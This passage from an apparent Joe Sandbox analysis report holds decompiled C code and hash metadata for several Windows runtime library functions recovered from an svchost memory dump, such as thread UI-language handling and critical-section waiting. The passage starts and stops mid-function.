                                          									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
                                          									_t337 = _a24;
                                          									_t263 = E03A52AE4( &_v36, _a8, _t290, _a16, _a20, _t337);
                                          									_v32 = _t263;
                                          									__eflags = _t263 - 0xc0000100;
                                          									if(_t263 == 0xc0000100) {
                                          										_v32 = E03A52C50(_v36, _a8, _t290, _a16, _a20, _t337, 1);
                                          									}
                                          									_v8 = _t327;
                                          									E03A52ACB();
                                          								}
                                          							}
                                          						}
                                          						L69:
                                          						_v8 = 0xfffffffe;
                                          						_t249 = _t337;
                                          					}
                                          					L70:
                                          					return E03A7D0D1(_t249);
                                          				}
                                          				L108:
                                          			}
                                          0x03a52a9a
                                          0x03a52a9d
                                          0x03a52add
                                          0x00000000
                                          0x03a52a9f
                                          0x03a52aa2
                                          0x03a52aa5
                                          0x03a52aa8
                                          0x03a52aab
                                          0x03a95cab
                                          0x03a95caf
                                          0x03a95cc5
                                          0x03a95cda
                                          0x03a95cdc
                                          0x03a95cdf
                                          0x03a95ce5
                                          0x00000000
                                          0x03a95ceb
                                          0x03a95ced
                                          0x03a95cee
                                          0x00000000
                                          0x03a95cee
                                          0x03a95cb1
                                          0x03a95cb4
                                          0x03a95cb9
                                          0x03a95cbb
                                          0x00000000
                                          0x03a95cbd
                                          0x03a95cbd
                                          0x00000000
                                          0x03a95cbd
                                          0x03a95cbb
                                          0x03a52ab1
                                          0x03a52ab1
                                          0x03a52ac4
                                          0x03a52ac6
                                          0x03a52ac6
                                          0x00000000
                                          0x03a52ac6
                                          0x03a52aab
                                          0x00000000
                                          0x03a52a00
                                          0x03a52a09
                                          0x03a52a0e
                                          0x03a52a21
                                          0x03a52a24
                                          0x03a52a35
                                          0x03a52a3a
                                          0x03a52a3d
                                          0x03a52a42
                                          0x03a52a59
                                          0x03a52a59
                                          0x03a52a5c
                                          0x03a52a5f
                                          0x03a52a5f
                                          0x03a529fa
                                          0x03a529f3
                                          0x03a52a64
                                          0x03a52a64
                                          0x03a52a6b
                                          0x03a52a6b
                                          0x03a52a6d
                                          0x03a52a72
                                          0x03a52a72
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: PATH
                                          • API String ID: 0-1036084923
                                          • Opcode ID: 98e99ea1d920db920a84784e5cc8372709210a9c3e1823dcae3e2065d819c220
                                          • Instruction ID: 7eba70ae540805a1c86065c1adcbb00d76b1dcafde5fb94eda9f25951e4f6382
                                          • Opcode Fuzzy Hash: 98e99ea1d920db920a84784e5cc8372709210a9c3e1823dcae3e2065d819c220
                                          • Instruction Fuzzy Hash: 2CC17D75E00219AFDB15DF98D981BADB7B5FF89700F58442AF801BB350DB34A941CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 80%
                                          			E03A5FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
                                          				char _v5;
                                          				signed int _v8;
                                          				signed int _v12;
                                          				char _v16;
                                          				char _v17;
                                          				char _v20;
                                          				signed int _v24;
                                          				char _v28;
                                          				char _v32;
                                          				signed int _v40;
                                          				void* __ecx;
                                          				void* __edi;
                                          				void* __ebp;
                                          				signed int _t73;
                                          				intOrPtr* _t75;
                                          				signed int _t77;
                                          				signed int _t79;
                                          				signed int _t81;
                                          				intOrPtr _t83;
                                          				intOrPtr _t85;
                                          				intOrPtr _t86;
                                          				signed int _t91;
                                          				signed int _t94;
                                          				signed int _t95;
                                          				signed int _t96;
                                          				signed int _t106;
                                          				signed int _t108;
                                          				signed int _t114;
                                          				signed int _t116;
                                          				signed int _t118;
                                          				signed int _t122;
                                          				signed int _t123;
                                          				void* _t129;
                                          				signed int _t130;
                                          				void* _t132;
                                          				intOrPtr* _t134;
                                          				signed int _t138;
                                          				signed int _t141;
                                          				signed int _t147;
                                          				intOrPtr _t153;
                                          				signed int _t154;
                                          				signed int _t155;
                                          				signed int _t170;
                                          				void* _t174;
                                          				signed int _t176;
                                          				signed int _t177;
                                          
                                          				_t129 = __ebx;
                                          				_push(_t132);
                                          				_push(__esi);
                                          				_t174 = _t132;
                                          				_t73 =  !( *( *(_t174 + 0x18)));
                                          				if(_t73 >= 0) {
                                          					L5:
                                          					return _t73;
                                          				} else {
                                          					E03A3EEF0(0x3b17b60);
                                          					_t134 =  *0x3b17b84; // 0x77997b80
                                          					_t2 = _t174 + 0x24; // 0x24
                                          					_t75 = _t2;
                                          					if( *_t134 != 0x3b17b80) {
                                          						_push(3);
                                          						asm("int 0x29");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						_push(0x3b17b60);
                                          						_t170 = _v8;
                                          						_v28 = 0;
                                          						_v40 = 0;
                                          						_v24 = 0;
                                          						_v17 = 0;
                                          						_v32 = 0;
                                          						__eflags = _t170 & 0xffff7cf2;
                                          						if((_t170 & 0xffff7cf2) != 0) {
                                          							L43:
                                          							_t77 = 0xc000000d;
                                          						} else {
                                          							_t79 = _t170 & 0x0000000c;
                                          							__eflags = _t79;
                                          							if(_t79 != 0) {
                                          								__eflags = _t79 - 0xc;
                                          								if(_t79 == 0xc) {
                                          									goto L43;
                                          								} else {
                                          									goto L9;
                                          								}
                                          							} else {
                                          								_t170 = _t170 | 0x00000008;
                                          								__eflags = _t170;
                                          								L9:
                                          								_t81 = _t170 & 0x00000300;
                                          								__eflags = _t81 - 0x300;
                                          								if(_t81 == 0x300) {
                                          									goto L43;
                                          								} else {
                                          									_t138 = _t170 & 0x00000001;
                                          									__eflags = _t138;
                                          									_v24 = _t138;
                                          									if(_t138 != 0) {
                                          										__eflags = _t81;
                                          										if(_t81 != 0) {
                                          											goto L43;
                                          										} else {
                                          											goto L11;
                                          										}
                                          									} else {
                                          										L11:
                                          										_push(_t129);
                                          										_t77 = E03A36D90( &_v20);
                                          										_t130 = _t77;
                                          										__eflags = _t130;
                                          										if(_t130 >= 0) {
                                          											_push(_t174);
                                          											__eflags = _t170 & 0x00000301;
                                          											if((_t170 & 0x00000301) == 0) {
                                          												_t176 = _a8;
                                          												__eflags = _t176;
                                          												if(__eflags == 0) {
                                          													L64:
                                          													_t83 =  *[fs:0x18];
                                          													_t177 = 0;
                                          													__eflags =  *(_t83 + 0xfb8);
                                          													if( *(_t83 + 0xfb8) != 0) {
                                          														E03A376E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
                                          														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
                                          													}
                                          													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
                                          													goto L15;
                                          												} else {
                                          													asm("sbb edx, edx");
                                          													_t114 = E03AC8938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
                                          													__eflags = _t114;
                                          													if(_t114 < 0) {
                                          														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
                                          														E03A2B150();
                                          													}
                                          													_t116 = E03AC6D81(_t176,  &_v16);
                                          													__eflags = _t116;
                                          													if(_t116 >= 0) {
                                          														__eflags = _v16 - 2;
                                          														if(_v16 < 2) {
                                          															L56:
                                          															_t118 = E03A375CE(_v20, 5, 0);
                                          															__eflags = _t118;
                                          															if(_t118 < 0) {
                                          																L67:
                                          																_t130 = 0xc0000017;
                                          																goto L32;
                                          															} else {
                                          																__eflags = _v12;
                                          																if(_v12 == 0) {
                                          																	goto L67;
                                          																} else {
                                          																	_t153 =  *0x3b18638; // 0x0
                                          																	_t122 = L03A338A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
                                          																	_t154 = _v12;
                                          																	_t130 = _t122;
                                          																	__eflags = _t130;
                                          																	if(_t130 >= 0) {
                                          																		_t123 =  *(_t154 + 4) & 0x0000ffff;
                                          																		__eflags = _t123;
                                          																		if(_t123 != 0) {
                                          																			_t155 = _a12;
                                          																			__eflags = _t155;
                                          																			if(_t155 != 0) {
                                          																				 *_t155 = _t123;
                                          																			}
                                          																			goto L64;
                                          																		} else {
                                          																			E03A376E2(_t154);
                                          																			goto L41;
                                          																		}
                                          																	} else {
                                          																		E03A376E2(_t154);
                                          																		_t177 = 0;
                                          																		goto L18;
                                          																	}
                                          																}
                                          															}
                                          														} else {
                                          															__eflags =  *_t176;
                                          															if( *_t176 != 0) {
                                          																goto L56;
                                          															} else {
                                          																__eflags =  *(_t176 + 2);
                                          																if( *(_t176 + 2) == 0) {
                                          																	goto L64;
                                          																} else {
                                          																	goto L56;
                                          																}
                                          															}
                                          														}
                                          													} else {
                                          														_t130 = 0xc000000d;
                                          														goto L32;
                                          													}
                                          												}
                                          												goto L35;
                                          											} else {
                                          												__eflags = _a8;
                                          												if(_a8 != 0) {
                                          													_t77 = 0xc000000d;
                                          												} else {
                                          													_v5 = 1;
                                          													L03A5FCE3(_v20, _t170);
                                          													_t177 = 0;
                                          													__eflags = 0;
                                          													L15:
                                          													_t85 =  *[fs:0x18];
                                          													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
                                          													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
                                          														L18:
                                          														__eflags = _t130;
                                          														if(_t130 != 0) {
                                          															goto L32;
                                          														} else {
                                          															__eflags = _v5 - _t130;
                                          															if(_v5 == _t130) {
                                          																goto L32;
                                          															} else {
                                          																_t86 =  *[fs:0x18];
                                          																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
                                          																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
                                          																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
                                          																}
                                          																__eflags = _t177;
                                          																if(_t177 == 0) {
                                          																	L31:
                                          																	__eflags = 0;
                                          																	L03A370F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
                                          																	goto L32;
                                          																} else {
                                          																	__eflags = _v24;
                                          																	_t91 =  *(_t177 + 0x20);
                                          																	if(_v24 != 0) {
                                          																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
                                          																		goto L31;
                                          																	} else {
                                          																		_t141 = _t91 & 0x00000040;
                                          																		__eflags = _t170 & 0x00000100;
                                          																		if((_t170 & 0x00000100) == 0) {
                                          																			__eflags = _t141;
                                          																			if(_t141 == 0) {
                                          																				L74:
                                          																				_t94 = _t91 & 0xfffffffd | 0x00000004;
                                          																				goto L27;
                                          																			} else {
                                          																				_t177 = E03A5FD22(_t177);
                                          																				__eflags = _t177;
                                          																				if(_t177 == 0) {
                                          																					goto L42;
                                          																				} else {
                                          																					_t130 = E03A5FD9B(_t177, 0, 4);
                                          																					__eflags = _t130;
                                          																					if(_t130 != 0) {
                                          																						goto L42;
                                          																					} else {
                                          																						_t68 = _t177 + 0x20;
                                          																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
                                          																						__eflags =  *_t68;
                                          																						_t91 =  *(_t177 + 0x20);
                                          																						goto L74;
                                          																					}
                                          																				}
                                          																			}
                                          																			goto L35;
                                          																		} else {
                                          																			__eflags = _t141;
                                          																			if(_t141 != 0) {
                                          																				_t177 = E03A5FD22(_t177);
                                          																				__eflags = _t177;
                                          																				if(_t177 == 0) {
                                          																					L42:
                                          																					_t77 = 0xc0000001;
                                          																					goto L33;
                                          																				} else {
                                          																					_t130 = E03A5FD9B(_t177, 0, 4);
                                          																					__eflags = _t130;
                                          																					if(_t130 != 0) {
                                          																						goto L42;
                                          																					} else {
                                          																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
                                          																						_t91 =  *(_t177 + 0x20);
                                          																						goto L26;
                                          																					}
                                          																				}
                                          																				goto L35;
                                          																			} else {
                                          																				L26:
                                          																				_t94 = _t91 & 0xfffffffb | 0x00000002;
                                          																				__eflags = _t94;
                                          																				L27:
                                          																				 *(_t177 + 0x20) = _t94;
                                          																				__eflags = _t170 & 0x00008000;
                                          																				if((_t170 & 0x00008000) != 0) {
                                          																					_t95 = _a12;
                                          																					__eflags = _t95;
                                          																					if(_t95 != 0) {
                                          																						_t96 =  *_t95;
                                          																						__eflags = _t96;
                                          																						if(_t96 != 0) {
                                          																							 *((short*)(_t177 + 0x22)) = 0;
                                          																							_t40 = _t177 + 0x20;
                                          																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
                                          																							__eflags =  *_t40;
                                          																						}
                                          																					}
                                          																				}
                                          																				goto L31;
                                          																			}
                                          																		}
                                          																	}
                                          																}
                                          															}
                                          														}
                                          													} else {
                                          														_t147 =  *( *[fs:0x18] + 0xfc0);
                                          														_t106 =  *(_t147 + 0x20);
                                          														__eflags = _t106 & 0x00000040;
                                          														if((_t106 & 0x00000040) != 0) {
                                          															_t147 = E03A5FD22(_t147);
                                          															__eflags = _t147;
                                          															if(_t147 == 0) {
                                          																L41:
                                          																_t130 = 0xc0000001;
                                          																L32:
                                          																_t77 = _t130;
                                          																goto L33;
                                          															} else {
                                          																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
                                          																_t106 =  *(_t147 + 0x20);
                                          																goto L17;
                                          															}
                                          															goto L35;
                                          														} else {
                                          															L17:
                                          															_t108 = _t106 | 0x00000080;
                                          															__eflags = _t108;
                                          															 *(_t147 + 0x20) = _t108;
                                          															 *( *[fs:0x18] + 0xfc0) = _t147;
                                          															goto L18;
                                          														}
                                          													}
                                          												}
                                          											}
                                          											L33:
                                          										}
                                          									}
                                          								}
                                          							}
                                          						}
                                          						L35:
                                          						return _t77;
                                          					} else {
                                          						 *_t75 = 0x3b17b80;
                                          						 *((intOrPtr*)(_t75 + 4)) = _t134;
                                          						 *_t134 = _t75;
                                          						 *0x3b17b84 = _t75;
                                          						_t73 = E03A3EB70(_t134, 0x3b17b60);
                                          						if( *0x3b17b20 != 0) {
                                          							_t73 =  *( *[fs:0x30] + 0xc);
                                          							if( *((char*)(_t73 + 0x28)) == 0) {
                                          								_t73 = E03A3FF60( *0x3b17b20);
                                          							}
                                          						}
                                          						goto L5;
                                          					}
                                          				}
                                          			}


















































                                          Strings
                                          • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 03A9BE0F
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                          • API String ID: 0-865735534
                                          • Opcode ID: 72fbffa1a1ee702e0d831e361551dd92f0bc79553d9a6bbc0d09fc2d58c86c5e
                                          • Instruction ID: 3821a8e14f30450072e1e754edcd5dfaf79fd638ee578af3744560a1cd4d1713
                                          • Opcode Fuzzy Hash: 72fbffa1a1ee702e0d831e361551dd92f0bc79553d9a6bbc0d09fc2d58c86c5e
                                          • Instruction Fuzzy Hash: 0BA1DD75A01606DFEB25DB68C554BAAB3B9AB48714F0846BFFC06DB780DB34D8418B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 63%
                                          			E03A22D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
                                          				signed char _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				intOrPtr _v28;
                                          				intOrPtr _v32;
                                          				signed int _v52;
                                          				void* __esi;
                                          				void* __ebp;
                                          				intOrPtr _t55;
                                          				signed int _t57;
                                          				signed int _t58;
                                          				char* _t62;
                                          				signed char* _t63;
                                          				signed char* _t64;
                                          				signed int _t67;
                                          				signed int _t72;
                                          				signed int _t77;
                                          				signed int _t78;
                                          				signed int _t88;
                                          				intOrPtr _t89;
                                          				signed char _t93;
                                          				signed int _t97;
                                          				signed int _t98;
                                          				signed int _t102;
                                          				signed int _t103;
                                          				intOrPtr _t104;
                                          				signed int _t105;
                                          				signed int _t106;
                                          				signed char _t109;
                                          				signed int _t111;
                                          				void* _t116;
                                          
                                          				_t102 = __edi;
                                          				_t97 = __edx;
                                          				_v12 = _v12 & 0x00000000;
                                          				_t55 =  *[fs:0x18];
                                          				_t109 = __ecx;
                                          				_v8 = __edx;
                                          				_t86 = 0;
                                          				_v32 = _t55;
                                          				_v24 = 0;
                                          				_push(__edi);
                                          				if(__ecx == 0x3b15350) {
                                          					_t86 = 1;
                                          					_v24 = 1;
                                          					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
                                          				}
                                          				_t103 = _t102 | 0xffffffff;
                                          				if( *0x3b17bc8 != 0) {
                                          					_push(0xc000004b);
                                          					_push(_t103);
                                          					E03A697C0();
                                          				}
                                          				if( *0x3b179c4 != 0) {
                                          					_t57 = 0;
                                          				} else {
                                          					_t57 = 0x3b179c8;
                                          				}
                                          				_v16 = _t57;
                                          				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
                                          					_t93 = _t109;
                                          					L23();
                                          				}
                                          				_t58 =  *_t109;
                                          				if(_t58 == _t103) {
                                          					__eflags =  *(_t109 + 0x14) & 0x01000000;
                                          					_t58 = _t103;
                                          					if(__eflags == 0) {
                                          						_t93 = _t109;
                                          						E03A51624(_t86, __eflags);
                                          						_t58 =  *_t109;
                                          					}
                                          				}
                                          				_v20 = _v20 & 0x00000000;
                                          				if(_t58 != _t103) {
                                          					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
                                          				}
                                          				_t104 =  *((intOrPtr*)(_t109 + 0x10));
                                          				_t88 = _v16;
                                          				_v28 = _t104;
                                          				L9:
                                          				while(1) {
                                          					if(E03A47D50() != 0) {
                                          						_t62 = ( *[fs:0x30])[0x50] + 0x228;
                                          					} else {
                                          						_t62 = 0x7ffe0382;
                                          					}
                                          					if( *_t62 != 0) {
                                          						_t63 =  *[fs:0x30];
                                          						__eflags = _t63[0x240] & 0x00000002;
                                          						if((_t63[0x240] & 0x00000002) != 0) {
                                          							_t93 = _t109;
                                          							E03ABFE87(_t93);
                                          						}
                                          					}
                                          					if(_t104 != 0xffffffff) {
                                          						_push(_t88);
                                          						_push(0);
                                          						_push(_t104);
                                          						_t64 = E03A69520();
                                          						goto L15;
                                          					} else {
                                          						while(1) {
                                          							_t97 =  &_v8;
                                          							_t64 = E03A5E18B(_t109 + 4, _t97, 4, _t88, 0);
                                          							if(_t64 == 0x102) {
                                          								break;
                                          							}
                                          							_t93 =  *(_t109 + 4);
                                          							_v8 = _t93;
                                          							if((_t93 & 0x00000002) != 0) {
                                          								continue;
                                          							}
                                          							L15:
                                          							if(_t64 == 0x102) {
                                          								break;
                                          							}
                                          							_t89 = _v24;
                                          							if(_t64 < 0) {
                                          								L03A7DF30(_t93, _t97, _t64);
                                          								_push(_t93);
                                          								_t98 = _t97 | 0xffffffff;
                                          								__eflags =  *0x3b16901;
                                          								_push(_t109);
                                          								_v52 = _t98;
                                          								if( *0x3b16901 != 0) {
                                          									_push(0);
                                          									_push(1);
                                          									_push(0);
                                          									_push(0x100003);
                                          									_push( &_v12);
                                          									_t72 = E03A69980();
                                          									__eflags = _t72;
                                          									if(_t72 < 0) {
                                          										_v12 = _t98 | 0xffffffff;
                                          									}
                                          								}
                                          								asm("lock cmpxchg [ecx], edx");
                                          								_t111 = 0;
                                          								__eflags = 0;
                                          								if(0 != 0) {
                                          									__eflags = _v12 - 0xffffffff;
                                          									if(_v12 != 0xffffffff) {
                                          										_push(_v12);
                                          										E03A695D0();
                                          									}
                                          								} else {
                                          									_t111 = _v12;
                                          								}
                                          								return _t111;
                                          							} else {
                                          								if(_t89 != 0) {
                                          									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
                                          									_t77 = E03A47D50();
                                          									__eflags = _t77;
                                          									if(_t77 == 0) {
                                          										_t64 = 0x7ffe0384;
                                          									} else {
                                          										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
                                          									}
                                          									__eflags =  *_t64;
                                          									if( *_t64 != 0) {
                                          										_t64 =  *[fs:0x30];
                                          										__eflags = _t64[0x240] & 0x00000004;
                                          										if((_t64[0x240] & 0x00000004) != 0) {
                                          											_t78 = E03A47D50();
                                          											__eflags = _t78;
                                          											if(_t78 == 0) {
                                          												_t64 = 0x7ffe0385;
                                          											} else {
                                          												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
                                          											}
                                          											__eflags =  *_t64 & 0x00000020;
                                          											if(( *_t64 & 0x00000020) != 0) {
                                          												_t64 = E03AA7016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
                                          											}
                                          										}
                                          									}
                                          								}
                                          								return _t64;
                                          							}
                                          						}
                                          						_t97 = _t88;
                                          						_t93 = _t109;
                                          						E03ABFDDA(_t97, _v12);
                                          						_t105 =  *_t109;
                                          						_t67 = _v12 + 1;
                                          						_v12 = _t67;
                                          						__eflags = _t105 - 0xffffffff;
                                          						if(_t105 == 0xffffffff) {
                                          							_t106 = 0;
                                          							__eflags = 0;
                                          						} else {
                                          							_t106 =  *(_t105 + 0x14);
                                          						}
                                          						__eflags = _t67 - 2;
                                          						if(_t67 > 2) {
                                          							__eflags = _t109 - 0x3b15350;
                                          							if(_t109 != 0x3b15350) {
                                          								__eflags = _t106 - _v20;
                                          								if(__eflags == 0) {
                                          									_t93 = _t109;
                                          									E03ABFFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
                                          								}
                                          							}
                                          						}
                                          						_push("RTL: Re-Waiting\n");
                                          						_push(0);
                                          						_push(0x65);
                                          						_v20 = _t106;
                                          						E03AB5720();
                                          						_t104 = _v28;
                                          						_t116 = _t116 + 0xc;
                                          						continue;
                                          					}
                                          				}
                                          			}





































                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RTL: Re-Waiting
                                          • API String ID: 0-316354757
                                          • Opcode ID: 04b9b579dab525e84f4505d3f185cb797dd34ce4cc39fcd557fa335146c13da8
                                          • Instruction ID: 0eeab4f9f26c98610f598d1caaa64029e25ad618f9e5bd387265a88864906dad
                                          • Opcode Fuzzy Hash: 04b9b579dab525e84f4505d3f185cb797dd34ce4cc39fcd557fa335146c13da8
                                          • Instruction Fuzzy Hash: 7461F331A00654AFDB31DB6CC984B7EBBB9EB49714F180AABE8119B2C1C7349A01C791
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 80%
                                          			E03AF0EA5(void* __ecx, void* __edx) {
                                          				signed int _v20;
                                          				char _v24;
                                          				intOrPtr _v28;
                                          				unsigned int _v32;
                                          				signed int _v36;
                                          				intOrPtr _v40;
                                          				char _v44;
                                          				intOrPtr _v64;
                                          				void* __ebx;
                                          				void* __edi;
                                          				signed int _t58;
                                          				unsigned int _t60;
                                          				intOrPtr _t62;
                                          				char* _t67;
                                          				char* _t69;
                                          				void* _t80;
                                          				void* _t83;
                                          				intOrPtr _t93;
                                          				intOrPtr _t115;
                                          				char _t117;
                                          				void* _t120;
                                          
                                          				_t83 = __edx;
                                          				_t117 = 0;
                                          				_t120 = __ecx;
                                          				_v44 = 0;
                                          				if(E03AEFF69(__ecx,  &_v44,  &_v32) < 0) {
                                          					L24:
                                          					_t109 = _v44;
                                          					if(_v44 != 0) {
                                          						E03AF1074(_t83, _t120, _t109, _t117, _t117);
                                          					}
                                          					L26:
                                          					return _t117;
                                          				}
                                          				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
                                          				_t5 = _t83 + 1; // 0x1
                                          				_v36 = _t5 << 0xc;
                                          				_v40 = _t93;
                                          				_t58 =  *(_t93 + 0xc) & 0x40000000;
                                          				asm("sbb ebx, ebx");
                                          				_t83 = ( ~_t58 & 0x0000003c) + 4;
                                          				if(_t58 != 0) {
                                          					_push(0);
                                          					_push(0x14);
                                          					_push( &_v24);
                                          					_push(3);
                                          					_push(_t93);
                                          					_push(0xffffffff);
                                          					_t80 = E03A69730();
                                          					_t115 = _v64;
                                          					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
                                          						_push(_t93);
                                          						E03AEA80D(_t115, 1, _v20, _t117);
                                          						_t83 = 4;
                                          					}
                                          				}
                                          				if(E03AEA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
                                          					goto L24;
                                          				}
                                          				_t60 = _v32;
                                          				_t97 = (_t60 != 0x100000) + 1;
                                          				_t83 = (_v44 -  *0x3b18b04 >> 0x14) + (_v44 -  *0x3b18b04 >> 0x14);
                                          				_v28 = (_t60 != 0x100000) + 1;
                                          				_t62 = _t83 + (_t60 >> 0x14) * 2;
                                          				_v40 = _t62;
                                          				if(_t83 >= _t62) {
                                          					L10:
                                          					asm("lock xadd [eax], ecx");
                                          					asm("lock xadd [eax], ecx");
                                          					if(E03A47D50() == 0) {
                                          						_t67 = 0x7ffe0380;
                                          					} else {
                                          						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                          					}
                                          					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                          						E03AE138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
                                          					}
                                          					if(E03A47D50() == 0) {
                                          						_t69 = 0x7ffe0388;
                                          					} else {
                                          						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                          					}
                                          					if( *_t69 != 0) {
                                          						E03ADFEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
                                          					}
                                          					if(( *0x3b18724 & 0x00000008) != 0) {
                                          						E03AE52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
                                          					}
                                          					_t117 = _v44;
                                          					goto L26;
                                          				}
                                          				while(E03AF15B5(0x3b18ae4, _t83, _t97, _t97) >= 0) {
                                          					_t97 = _v28;
                                          					_t83 = _t83 + 2;
                                          					if(_t83 < _v40) {
                                          						continue;
                                          					}
                                          					goto L10;
                                          				}
                                          				goto L24;
                                          			}

























                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: `
                                          • API String ID: 0-2679148245
                                          • Opcode ID: b529a239a7cb529400f32484ed3fe31ff6163f64e29398c8a850d3dcc50a954c
                                          • Instruction ID: 44f9a3c6c3b93a7a690a026140fae8c44950c2731d4cbd14270be8ac12114246
                                          • Opcode Fuzzy Hash: b529a239a7cb529400f32484ed3fe31ff6163f64e29398c8a850d3dcc50a954c
                                          • Instruction Fuzzy Hash: 9551B0712043819FD324DF69D980B1BB7E5EBC4704F080A2EFA969B291D771E805CB62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 75%
                                          			E03A5F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
                                          				intOrPtr _v8;
                                          				intOrPtr _v12;
                                          				intOrPtr _v16;
                                          				char* _v20;
                                          				intOrPtr _v24;
                                          				char _v28;
                                          				intOrPtr _v32;
                                          				char _v36;
                                          				char _v44;
                                          				char _v52;
                                          				intOrPtr _v56;
                                          				char _v60;
                                          				intOrPtr _v72;
                                          				void* _t51;
                                          				void* _t58;
                                          				signed short _t82;
                                          				short _t84;
                                          				signed int _t91;
                                          				signed int _t100;
                                          				signed short* _t103;
                                          				void* _t108;
                                          				intOrPtr* _t109;
                                          
                                          				_t103 = __ecx;
                                          				_t82 = __edx;
                                          				_t51 = E03A44120(0, __ecx, 0,  &_v52, 0, 0, 0);
                                          				if(_t51 >= 0) {
                                          					_push(0x21);
                                          					_push(3);
                                          					_v56 =  *0x7ffe02dc;
                                          					_v20 =  &_v52;
                                          					_push( &_v44);
                                          					_v28 = 0x18;
                                          					_push( &_v28);
                                          					_push(0x100020);
                                          					_v24 = 0;
                                          					_push( &_v60);
                                          					_v16 = 0x40;
                                          					_v12 = 0;
                                          					_v8 = 0;
                                          					_t58 = E03A69830();
                                          					_t87 =  *[fs:0x30];
                                          					_t108 = _t58;
                                          					L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
                                          					if(_t108 < 0) {
                                          						L11:
                                          						_t51 = _t108;
                                          					} else {
                                          						_push(4);
                                          						_push(8);
                                          						_push( &_v36);
                                          						_push( &_v44);
                                          						_push(_v60);
                                          						_t108 = E03A69990();
                                          						if(_t108 < 0) {
                                          							L10:
                                          							_push(_v60);
                                          							E03A695D0();
                                          							goto L11;
                                          						} else {
